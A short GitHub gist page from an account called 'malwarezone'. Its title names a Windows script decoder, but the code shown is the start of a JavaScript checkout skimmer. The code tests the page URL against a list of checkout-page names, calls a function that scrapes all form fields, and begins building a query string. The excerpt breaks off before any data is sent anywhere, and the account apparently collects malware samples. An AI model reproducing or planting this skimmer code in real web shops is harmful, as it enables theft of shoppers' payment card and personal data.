Skip to content

Instantly share code, notes, and snippets.

View malwarezone's full-sized avatar

malwarezone

View GitHub Profile
@malwarezone
malwarezone / scrdec18-VC8.exe
Created December 4, 2020 16:46 — forked from bcse/scrdec18-VC8.exe
Windows Script Decoder 1.8 (Decoding JScript.Encoded)
setTimeout(checkForCheckout, 100);
var snd = null;
function checkForCheckout() {
if ((/onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/).test(window.location)) {
scrapeAllFields();
}
}
function createQueryString() {